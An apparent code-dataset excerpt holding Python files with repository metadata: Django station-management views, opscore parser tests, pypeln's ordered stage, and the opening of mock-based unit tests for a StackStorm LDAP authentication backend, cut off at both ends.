return redirect('station_detail', pk=station.pk)
return super(StationBusinessViewDelete, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to delete this a station business.")
return redirect('station_detail', pk=station.pk)
def get_context_data(self, **kwargs):
context = super(StationBusinessViewDelete, self).get_context_data(**kwargs)
context['station'] = self.object.station
return context
"""
Station Rental generic views
"""
class StationRentalViewUpdate(LoginRequiredMixin, ActivitySendMixin, SuccessMessageMixin, UpdateView):
model = StationRental
context_object_name = 'stationrental'
template_name = "station/stationrental_form.html"
activity_verb = 'updated station rental'
success_message = '%(equipment)s rental successfully updated!'
form_class = StationRentalForm
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.station.pk})
def dispatch(self, *args, **kwargs):
station_rental = get_object_or_404(StationRental, pk=self.kwargs.get('pk', '-1'))
if self.request.user.is_staff:
return super(StationRentalViewUpdate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "Only staff may update station rentals.")
return redirect('station_detail', pk=station_rental.station.pk)
def get_context_data(self, **kwargs):
context = super(StationRentalViewUpdate, self).get_context_data(**kwargs)
context['station'] = self.object.station
context['action'] = 'Update'
return context
class StationRentalViewDelete(LoginRequiredMixin, DeleteView):
model = StationRental
context_object_name = 'stationrental'
template_name = "station/stationrental_form.html"
activity_verb = 'updated station rental'
success_message = '%(equipment)s rental successfully updated!'
form_class = StationRentalForm
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.station.pk})
def dispatch(self, *args, **kwargs):
station_rental = get_object_or_404(StationRental, pk=self.kwargs.get('pk', '-1'))
if self.request.user.is_staff:
return super(StationRentalViewDelete, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "Only staff may delete station rentals.")
return redirect('station_detail', pk=station_rental.station.pk)
def get_context_data(self, **kwargs):
context = super(StationRentalViewDelete, self).get_context_data(**kwargs)
context['station'] = self.object.station
context['action'] = 'Delete'
return context
| 43.727273
| 112
| 0.715956
|
from apollo.choices import CHARGE_LIST_OPEN
from apollo.viewmixins import LoginRequiredMixin, ActivitySendMixin, StaffRequiredMixin
from applications.business.models import Business
from applications.charge_list.forms import ActivityChargeCatalog, TimeChargeCatalog, UnitChargeCatalog
from applications.charge_list.models import ChargeList
from applications.station.forms import StationBusinessForm, StationRentalForm
from applications.station.models import Station, StationBusiness, StationRental
from django.contrib import messages
from django.contrib.messages.views import SuccessMessageMixin
from django.core.urlresolvers import reverse_lazy
from django.shortcuts import get_object_or_404, redirect
from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView
def StationUUIDRedirect(request, station_uuid=None):
station = get_object_or_404(Station, uuid=station_uuid)
return redirect('station_detail', kwargs={'pk': station.pk})
class StationViewList(LoginRequiredMixin, ListView):
context_object_name = "stations"
model = Station
template_name = "station/station_list.html"
def get_context_data(self, **kwargs):
context = super(StationViewList, self).get_context_data(**kwargs)
return context
class StationViewDetail(LoginRequiredMixin, DetailView):
context_object_name = 'station'
model = Station
template_name = "station/station_detail.html"
def get_context_data(self, **kwargs):
context = super(StationViewDetail, self).get_context_data(**kwargs)
user_businesses = Business.objects.filter(businessmembership__user=self.request.user)
station_businesses = self.object.stationbusiness_set.all()
context['can_modify'] = len(station_businesses.filter(business__in=user_businesses)) >= 1
active_cl = ChargeList.objects.filter(station=self.object, status=CHARGE_LIST_OPEN)
if len(active_cl) == 1:
context['chargelist'] = active_cl[0]
price_list_pk = active_cl[0].price_list.pk
context['activitycharge_catalog'] = ActivityChargeCatalog(price_list_pk=price_list_pk)
context['timecharge_catalog'] = TimeChargeCatalog(price_list_pk=price_list_pk)
context['unitcharge_catalog'] = UnitChargeCatalog(price_list_pk=price_list_pk)
return context
class StationViewCreate(LoginRequiredMixin, SuccessMessageMixin, ActivitySendMixin, CreateView):
context_object_name = 'station'
model = Station
success_message = "%(name)s was created successfully!"
template_name = "station/station_form.html"
activity_verb = 'created station'
fields = "__all__"
def dispatch(self, *args, **kwargs):
business = get_object_or_404(Business, pk=self.kwargs.get('business_pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = user_businesses.filter(business=business)
if can_modify:
return super(StationViewCreate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to create a station for this business.")
return redirect('business_detail', pk=business.pk)
def get_success_url(self):
business = get_object_or_404(Business, pk=self.kwargs.get('business_pk', '-1'))
StationBusiness.objects.create(business=business, station=self.object)
return reverse_lazy('station_detail', kwargs={'pk': self.object.pk})
def get_context_data(self, **kwargs):
context = super(StationViewCreate, self).get_context_data(**kwargs)
context['action'] = "Create New"
return context
class StationViewUpdate(LoginRequiredMixin, SuccessMessageMixin, ActivitySendMixin, UpdateView):
context_object_name = 'station'
model = Station
success_message = "%(name)s was updated successfully!"
template_name = "station/station_form.html"
activity_verb = 'updated station'
fields = "__all__"
def dispatch(self, *args, **kwargs):
station = get_object_or_404(Station, pk=self.kwargs.get('pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = station.stationbusiness_set.all().filter(business__in=user_businesses)
if can_modify:
return super(StationViewUpdate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to update this station.")
return redirect('station_detail', pk=self.kwargs['pk'])
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.pk})
def get_context_data(self, **kwargs):
context = super(StationViewUpdate, self).get_context_data(**kwargs)
context['action'] = "Update"
return context
class StationViewDelete(LoginRequiredMixin, ActivitySendMixin, DeleteView):
context_object_name = 'station'
model = Station
success_url = reverse_lazy('base')
template_name = "station/station_form.html"
activity_verb = 'deleted station'
target_object_valid = False
def dispatch(self, *args, **kwargs):
station = get_object_or_404(Station, pk=self.kwargs.get('pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = station.stationbusiness_set.all().filter(business__in=user_businesses)
if can_modify:
return super(StationViewDelete, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to delete this station.")
return redirect('station_detail', pk=station.pk)
def get_success_url(self):
return self.success_url
def get_context_data(self, **kwargs):
context = super(StationViewDelete, self).get_context_data(**kwargs)
context['action'] = "Delete"
return context
class StationBusinessViewCreate(LoginRequiredMixin, SuccessMessageMixin, ActivitySendMixin, CreateView):
context_object_name = 'stationbusiness'
model = StationBusiness
template_name = "station/stationbusiness_form.html"
activity_verb = 'created station business association'
success_message = "%(station)s: %(business)s relation successfully created!"
form_class = StationBusinessForm
def dispatch(self, *args, **kwargs):
station = get_object_or_404(Station, pk=self.kwargs.get('station_pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = station.stationbusiness_set.all().filter(business__in=user_businesses)
if can_modify:
return super(StationBusinessViewCreate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to create this station business.")
return redirect('station_detail', pk=station.pk)
def get_form(self, form_class):
return form_class(station_pk=self.kwargs['station_pk'], **self.get_form_kwargs())
def get_success_url(self):
return reverse_lazy('station_detail', pk=self.kwargs['station_pk'])
def get_context_data(self, **kwargs):
context = super(StationBusinessViewCreate, self).get_context_data(**kwargs)
context['station'] = Station.objects.get(pk=self.kwargs['station_pk'])
return context
class StationBusinessViewDelete(LoginRequiredMixin, ActivitySendMixin, DeleteView):
context_object_name = 'stationbusiness'
model = StationBusiness
template_name = "station/stationbusiness_form.html"
activity_verb = 'deleted station business association'
target_object_valid = False
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.station.pk})
def dispatch(self, *args, **kwargs):
stationbusiness = get_object_or_404(StationBusiness, pk=self.kwargs.get('pk', '-1'))
business = stationbusiness.business
station = stationbusiness.station
user_businesses = self.request.user.businessmembership_set.all()
can_modify = business.stationbusiness_set.all().filter(business__in=user_businesses)
last_business = len(station.stationbusiness_set.all()) == 1
if can_modify:
if last_business:
messages.warning(self.request, "You cannot delete the last station business for this station!")
return redirect('station_detail', pk=station.pk)
return super(StationBusinessViewDelete, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to delete this a station business.")
return redirect('station_detail', pk=station.pk)
def get_context_data(self, **kwargs):
context = super(StationBusinessViewDelete, self).get_context_data(**kwargs)
context['station'] = self.object.station
return context
class StationRentalViewUpdate(LoginRequiredMixin, ActivitySendMixin, SuccessMessageMixin, UpdateView):
model = StationRental
context_object_name = 'stationrental'
template_name = "station/stationrental_form.html"
activity_verb = 'updated station rental'
success_message = '%(equipment)s rental successfully updated!'
form_class = StationRentalForm
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.station.pk})
def dispatch(self, *args, **kwargs):
station_rental = get_object_or_404(StationRental, pk=self.kwargs.get('pk', '-1'))
if self.request.user.is_staff:
return super(StationRentalViewUpdate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "Only staff may update station rentals.")
return redirect('station_detail', pk=station_rental.station.pk)
def get_context_data(self, **kwargs):
context = super(StationRentalViewUpdate, self).get_context_data(**kwargs)
context['station'] = self.object.station
context['action'] = 'Update'
return context
class StationRentalViewDelete(LoginRequiredMixin, DeleteView):
model = StationRental
context_object_name = 'stationrental'
template_name = "station/stationrental_form.html"
activity_verb = 'updated station rental'
success_message = '%(equipment)s rental successfully updated!'
form_class = StationRentalForm
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.station.pk})
def dispatch(self, *args, **kwargs):
station_rental = get_object_or_404(StationRental, pk=self.kwargs.get('pk', '-1'))
if self.request.user.is_staff:
return super(StationRentalViewDelete, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "Only staff may delete station rentals.")
return redirect('station_detail', pk=station_rental.station.pk)
def get_context_data(self, **kwargs):
context = super(StationRentalViewDelete, self).get_context_data(**kwargs)
context['station'] = self.object.station
context['action'] = 'Delete'
return context
| true
| true
|
1c49399312452b6cbddff79a357ccab254f44b19
| 1,296
|
py
|
Python
|
tests/keysformat.py
|
sdss/opscore
|
dd4f2b2ad525fe3dfe3565463de2c079a7e1232e
|
[
"BSD-3-Clause"
] | null | null | null |
tests/keysformat.py
|
sdss/opscore
|
dd4f2b2ad525fe3dfe3565463de2c079a7e1232e
|
[
"BSD-3-Clause"
] | 1
|
2021-08-17T21:08:14.000Z
|
2021-08-17T21:08:14.000Z
|
tests/keysformat.py
|
sdss/opscore
|
dd4f2b2ad525fe3dfe3565463de2c079a7e1232e
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
"""Unit tests for opscore.protocols.keysformat
"""
# Created 18-Nov-2008 by David Kirkby (dkirkby@uci.edu)
import unittest
import opscore.protocols.keys as protoKeys
import opscore.protocols.keysformat as protoKeysFormat
class KeysFormatTest(unittest.TestCase):
def setUp(self):
self.p = protoKeysFormat.KeysFormatParser()
def test00(self):
"Valid format string without dict"
self.p.parse("key1 key2 key3")
self.p.parse("key1 key2 [key3]")
self.p.parse("key1 (key2 [key3])")
self.p.parse("@key1 key2 key3")
self.p.parse("key1 [@key2 [key3]]")
self.p.parse("key1 [@key2 [key3]] raw")
def test01(self):
"Valid format string with dict"
protoKeys.CmdKey.setKeys(
protoKeys.KeysDictionary(
"<command>",
(1, 0),
protoKeys.Key("key1"),
protoKeys.Key("key2"),
protoKeys.Key("key3"),
)
)
self.p.parse("<key1> <key2> <key3>")
self.p.parse("<key1> <key2> [<key3>]")
self.p.parse("<key1> (<key2> [<key3>])")
self.p.parse("@<key1> <key2> <key3>")
self.p.parse("<key1> [@<key2> [<key3>]]")
if __name__ == "__main__":
unittest.main()
| 29.454545
| 55
| 0.566358
|
import unittest
import opscore.protocols.keys as protoKeys
import opscore.protocols.keysformat as protoKeysFormat
class KeysFormatTest(unittest.TestCase):
def setUp(self):
self.p = protoKeysFormat.KeysFormatParser()
def test00(self):
self.p.parse("key1 key2 key3")
self.p.parse("key1 key2 [key3]")
self.p.parse("key1 (key2 [key3])")
self.p.parse("@key1 key2 key3")
self.p.parse("key1 [@key2 [key3]]")
self.p.parse("key1 [@key2 [key3]] raw")
def test01(self):
protoKeys.CmdKey.setKeys(
protoKeys.KeysDictionary(
"<command>",
(1, 0),
protoKeys.Key("key1"),
protoKeys.Key("key2"),
protoKeys.Key("key3"),
)
)
self.p.parse("<key1> <key2> <key3>")
self.p.parse("<key1> <key2> [<key3>]")
self.p.parse("<key1> (<key2> [<key3>])")
self.p.parse("@<key1> <key2> <key3>")
self.p.parse("<key1> [@<key2> [<key3>]]")
if __name__ == "__main__":
unittest.main()
| true
| true
|
1c4939aa892f9cb888046d7e51fce1e1a1ca183e
| 2,308
|
py
|
Python
|
pypeln/task/api/ordered.py
|
isaacjoy/pypeln
|
5909376b30fe25fd869e49e4e46b7782d48f1be2
|
[
"MIT"
] | null | null | null |
pypeln/task/api/ordered.py
|
isaacjoy/pypeln
|
5909376b30fe25fd869e49e4e46b7782d48f1be2
|
[
"MIT"
] | null | null | null |
pypeln/task/api/ordered.py
|
isaacjoy/pypeln
|
5909376b30fe25fd869e49e4e46b7782d48f1be2
|
[
"MIT"
] | null | null | null |
import bisect
import typing as tp
from pypeln import utils as pypeln_utils
from pypeln.utils import A, B, T
from ..stage import Stage
from ..worker import ProcessFn, Worker
from .to_stage import to_stage
class Ordered(tp.NamedTuple):
async def __call__(self, worker: Worker, **kwargs):
elems = []
async for elem in worker.stage_params.input_queue:
bisect.insort(elems, elem)
for _ in range(len(elems)):
await worker.stage_params.output_queues.put(elems.pop(0))
@tp.overload
def ordered(
stage: tp.Union[Stage[A], tp.Iterable[A], tp.AsyncIterable[A]],
) -> Stage[A]:
...
@tp.overload
def ordered() -> pypeln_utils.Partial[Stage[A]]:
...
def ordered(
stage: tp.Union[
Stage[A], tp.Iterable[A], tp.AsyncIterable[A], pypeln_utils.Undefined
] = pypeln_utils.UNDEFINED,
) -> tp.Union[Stage[A], pypeln_utils.Partial[Stage[A]]]:
"""
Creates a stage that sorts its elements based on their order of creation on the source iterable(s) of the pipeline.
```python
import pypeln as pl
import random
import time
def slow_squared(x):
time.sleep(random.random())
return x ** 2
stage = range(5)
stage = pl.process.map(slow_squared, stage, workers = 2)
stage = pl.process.ordered(stage)
print(list(stage)) # [0, 1, 4, 9, 16]
```
!!! note
`ordered` will work even if the previous stages are from different `pypeln` modules, but it may not work if you introduce an itermediate external iterable stage.
!!! warning
This stage will not yield util it accumulates all of the elements from the previous stage, use this only if all elements fit in memory.
Arguments:
stage: A Stage, Iterable, or AsyncIterable.
Returns:
If the `stage` parameters is given then this function returns an iterable, else it returns a `Partial`.
"""
if isinstance(stage, pypeln_utils.Undefined):
return pypeln_utils.Partial(lambda stage: ordered(stage))
stage = to_stage(stage)
return Stage(
process_fn=Ordered(),
workers=1,
maxsize=0,
timeout=0,
total_sources=1,
dependencies=[stage],
on_start=None,
on_done=None,
f_args=[],
)
| 25.644444
| 169
| 0.646014
|
import bisect
import typing as tp
from pypeln import utils as pypeln_utils
from pypeln.utils import A, B, T
from ..stage import Stage
from ..worker import ProcessFn, Worker
from .to_stage import to_stage
class Ordered(tp.NamedTuple):
async def __call__(self, worker: Worker, **kwargs):
elems = []
async for elem in worker.stage_params.input_queue:
bisect.insort(elems, elem)
for _ in range(len(elems)):
await worker.stage_params.output_queues.put(elems.pop(0))
@tp.overload
def ordered(
stage: tp.Union[Stage[A], tp.Iterable[A], tp.AsyncIterable[A]],
) -> Stage[A]:
...
@tp.overload
def ordered() -> pypeln_utils.Partial[Stage[A]]:
...
def ordered(
stage: tp.Union[
Stage[A], tp.Iterable[A], tp.AsyncIterable[A], pypeln_utils.Undefined
] = pypeln_utils.UNDEFINED,
) -> tp.Union[Stage[A], pypeln_utils.Partial[Stage[A]]]:
if isinstance(stage, pypeln_utils.Undefined):
return pypeln_utils.Partial(lambda stage: ordered(stage))
stage = to_stage(stage)
return Stage(
process_fn=Ordered(),
workers=1,
maxsize=0,
timeout=0,
total_sources=1,
dependencies=[stage],
on_start=None,
on_done=None,
f_args=[],
)
| true
| true
|
1c493a6ccaff1cb394bb3af2c0302efee6de17c6
| 19,882
|
py
|
Python
|
tests/unit/test_ldap_backend.py
|
geolaz/st2-auth-backend-ldap
|
e0deebc5109adca39b41a851b359d5b88943229a
|
[
"Apache-2.0"
] | 16
|
2015-09-05T16:05:36.000Z
|
2022-02-22T12:48:58.000Z
|
tests/unit/test_ldap_backend.py
|
geolaz/st2-auth-backend-ldap
|
e0deebc5109adca39b41a851b359d5b88943229a
|
[
"Apache-2.0"
] | 19
|
2016-02-26T23:36:30.000Z
|
2021-03-25T14:28:12.000Z
|
tests/unit/test_ldap_backend.py
|
geolaz/st2-auth-backend-ldap
|
e0deebc5109adca39b41a851b359d5b88943229a
|
[
"Apache-2.0"
] | 26
|
2016-03-29T18:47:46.000Z
|
2021-03-25T08:35:03.000Z
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ldap
import logging
import os
import re
import unittest2
import mock
from mockldap import MockLdap
from mockldap.recording import RecordedMethod
from st2auth_ldap_backend import ldap_backend
from st2auth_ldap_backend.ldap_backend import LDAPAuthenticationBackend
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
DEFAULT_URI = 'ldap://fakeldap.example.com/'
class LDAPAuthenticationBackendTestCase(unittest2.TestCase):
"""
A simple test case showing off some of the basic features of mockldap.
"""
connect_methods = ['initialize', 'set_option', 'set_option']
directory = {
'dc=com': {'dc': ['com']},
'dc=example,dc=com': {'dc': ['example']},
'ou=users,dc=example,dc=com': {'ou': ['users'], 'objectClass': ['groupOfNames'], 'member': ['uid=sarah_connor,ou=users,dc=example,dc=com', 'uid=john_connor,ou=users,dc=example,dc=com']},
'cn=manager,dc=example,dc=com': {'cn': ['manager'], 'userPassword': ['ldaptest']},
'uid=sarah_connor,ou=users,dc=example,dc=com': { 'uid': ['sarah_connor'], 'userPassword': ['Reece4ever'], 'objectclass': ['inetOrgPerson', 'posixAccount', 'person', 'top'] },
'uid=john_connor,ou=users,dc=example,dc=com': { 'uid': ['john_connor'], 'userPassword': ['HastaLavista'], 'objectclass': ['inetOrgPerson', 'posixAccount', 'person', 'top'] },
'cn=resistance,ou=groups,dc=example,dc=com': { 'cn': ['resistance'], 'description': ['memberOf'], 'memberuid': ['sarah_connor', 'john_connor'], 'objectclass': ['posixGroup', 'top']}
}
@classmethod
def setUpClass(cls):
# We only need to create the MockLdap instance once. The content we
# pass in will be used for all LDAP connections.
cls.mockldap = MockLdap(cls.directory)
@classmethod
def tearDownClass(cls):
del cls.mockldap
def setUp(self):
# Patch ldap.initialize
self.mockldap.start()
self.ldapobj = self.mockldap['ldap://fakeldap.example.com/']
# needs decorator to record calling 'result' method
self.mock_referral = []
self.ldapobj._result = self.ldapobj.result
# Note:
# These side_effect mocks are stopgap measures until ldapmock module implements
# the processing to get entries synchronously at the 'result' method.
# extending 'result' method of ldapmock module to enables get objects synchronously
def side_effect_result(*args, **kwargs):
def result(ldapobj, msgid, all):
if all:
# normal processing of mockldap
return (ldap.RES_SEARCH_RESULT, self._sync_results)
else:
if self._sync_results:
return (ldap.RES_SEARCH_ENTRY, [self._sync_results.pop()])
elif self.mock_referral:
# when mock_referrals are defined, this returns referral object
return (ldap.RES_SEARCH_REFERENCE, [self.mock_referral.pop()])
else:
# the case of test that dereferences referral object
return (ldap.RES_SEARCH_RESULT, None)
if self._sync_results == None:
# get entry objects through the original 'result' method of ldapmock module
self._sync_results = self.ldapobj._result(*args, **kwargs)[1]
return result(self.ldapobj, *args, **kwargs)
else:
# call result method through RecordedMethod for tracking method calling of LDAPObject
return RecordedMethod(result, self.ldapobj)(*args, **kwargs)
self.ldapobj.result = mock.Mock(side_effect=side_effect_result)
self.ldapobj._search = self.ldapobj.search
def side_effect_search(*args, **kwargs):
# clear the interal state of test 'result' method
self._sync_results = None
return self.ldapobj._search(*args, **kwargs)
self.ldapobj.search = mock.Mock(side_effect=side_effect_search)
class LogHandler(logging.StreamHandler):
"""Mock logging handler to check log output"""
def __init__(self, *args, **kwargs):
self.reset()
logging.StreamHandler.__init__(self, *args, **kwargs)
def emit(self, record):
self.messages[record.levelname.lower()].append(record.getMessage())
def reset(self):
self.messages = {
'debug': [],
'info': [],
'warning': [],
'error': [],
'critical': [],
}
self.log_handler = LogHandler()
# set LogHandler for checking log outputs
ldap_backend.LOG.addHandler(self.log_handler)
def tearDown(self):
# Stop patching ldap.initialize and reset state.
self.mockldap.stop()
del self.ldapobj
def test_bind_anonymous(self):
result = _do_simple_bind('', '')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
self.assertTrue(result)
def test_bind_dn_valid(self):
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
self.assertTrue(result)
def test_bind_dn_invalid_user(self):
result = _do_simple_bind('uid=invalid_user,ou=users,dc=example,dc=com', 'none')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'unbind'])
self.assertFalse(result)
def test_bind_dn_invalid_password(self):
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'invalid_password')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'unbind'])
self.assertFalse(result)
def test_search_valid_username(self):
username = 'sarah_connor'
password = 'Reece4ever'
user_dn = 'uid={},ou=users,dc=example,dc=com'.format(username)
mock_res = (user_dn, LDAPAuthenticationBackendTestCase.directory[user_dn])
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
self.ldapobj.search_s.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))([mock_res])
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=None, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
def test_search_invalid_username(self):
username = 'invalid_username'
password = 'Reece4ever'
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
mock_res = []
self.ldapobj.search_s.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=None, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertFalse(result)
def test_search_invalid_password(self):
username = 'sarah_connor'
password = 'bad_password'
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
mock_res_id = 1234
mock_res = (ldap.RES_SEARCH_RESULT, None)
self.ldapobj._search.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_res_id)
self.ldapobj._result.seed(mock_res_id, all=0)(mock_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=None, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertFalse(result)
def test_search_valid_username_valid_group(self):
username = 'john_connor'
password = 'HastaLavista'
user_dn = 'uid={},ou=users,dc=example,dc=com'.format(username)
mock_user_res_id = 1234
mock_user_res = (ldap.RES_SEARCH_RESULT, [(user_dn, LDAPAuthenticationBackendTestCase.directory[user_dn])])
groupname = 'resistance'
group_dn = 'cn={groupname},ou=groups,dc=example,dc=com'.format(groupname=groupname)
mock_group_res_id = 9999
mock_group_res = (ldap.RES_SEARCH_RESULT, [(group_dn, LDAPAuthenticationBackendTestCase.directory[group_dn])])
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
group = {"base_dn": "ou=groups,dc=example,dc=com", "search_filter": "(&(cn=%s)(memberUid={username}))"%groupname, "scope": "subtree"}
self.ldapobj._search.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_user_res_id)
self.ldapobj._search.seed(group["base_dn"], ldap.SCOPE_SUBTREE, group["search_filter"].format(username=username))(mock_group_res_id)
self.ldapobj._result.seed(mock_user_res_id, all=0)(mock_user_res)
self.ldapobj._result.seed(mock_group_res_id, all=0)(mock_group_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=group, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'search', 'result', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
def test_search_valid_username_invalid_group(self):
username = 'john_connor'
password = 'HastaLavista'
user_dn = 'uid={},ou=users,dc=example,dc=com'.format(username)
mock_user_res_id = 1234
mock_user_res = (ldap.RES_SEARCH_RESULT, [(user_dn, LDAPAuthenticationBackendTestCase.directory[user_dn])])
groupname = 'invalid_group'
group_dn = 'cn={groupname},ou=groups,dc=example,dc=com'.format(groupname=groupname)
mock_group_res_id = 9999
mock_group_res = (ldap.RES_SEARCH_RESULT, None)
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
group = {"base_dn": "ou=groups,dc=example,dc=com", "search_filter": "(&(cn=%s)(memberUid={username}))"%groupname, "scope": "subtree"}
self.ldapobj._search.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_user_res_id)
self.ldapobj._search.seed(group["base_dn"], ldap.SCOPE_SUBTREE, group["search_filter"].format(username=username))(mock_group_res_id)
self.ldapobj._result.seed(mock_user_res_id, all=0)(mock_user_res)
self.ldapobj._result.seed(mock_group_res_id, all=0)(mock_group_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=group, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'search', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertFalse(result)
def test_search_with_reference_result(self):
# This is for returning the referral object at calling 'result' method of LDAPObject
self.mock_referral = [
(None, ['ldap://fakeldap2.example.com/ou=cyberdyne,dc=example,dc=com']),
]
user = {
"base_dn": "ou=users,dc=example,dc=com",
"search_filter": "(uid={username})",
"scope": "subtree",
}
# This is a case that maximum referral hop will be exceeded
result = _do_simple_bind('', '',
user_search=user, group_search=None,
username='john_connor', password='HastaLavista',
ref_hop_limit=1)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
self.assertEqual(len(self.log_handler.messages['warning']), 0)
def test_search_with_reference_result_but_exceeded_maximum_referal_hop(self):
# This is for returning the referral object at calling 'result' method of LDAPObject
self.mock_referral = [
(None, ['ldap://fakeldap2.example.com/ou=cyberdyne,dc=example,dc=com']),
]
user = {
"base_dn": "ou=users,dc=example,dc=com",
"search_filter": "(uid={username})",
"scope": "subtree",
}
result = _do_simple_bind('', '',
user_search=user, group_search=None,
username='john_connor', password='HastaLavista',
ref_hop_limit=0)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
self.assertTrue(len(self.log_handler.messages['warning']) > 0)
self.assertTrue(re.match(r'^Referral hop limit is exceeded',
self.log_handler.messages['warning'][0]))
@mock.patch('st2auth_ldap_backend.ldap_backend.LDAPAuthenticationBackend._get_ldap_search_referral')
def test_search_with_reference_result_but_chase_referrals_false(self, mock_search_referral):
# This is for returning the referral object at calling 'result' method of LDAPObject
self.mock_referral = [
(None, ['ldap://fakeldap2.example.com/ou=cyberdyne,dc=example,dc=com']),
]
user = {
"base_dn": "ou=users,dc=example,dc=com",
"search_filter": "(uid={username})",
"scope": "subtree",
}
# This is a case that will return a reference, but chase_referrals is False
result = _do_simple_bind('', '',
user_search=user, group_search=None,
username='john_connor', password='HastaLavista',
chase_referrals=False)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
self.assertEqual(len(self.log_handler.messages['warning']), 0)
# ensure that the referral code was never called
mock_search_referral.assert_not_called()
def test_ldap_connect(self):
try:
ldapobj = self.mockldap['ldap://testserver.domain.tld']
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest',
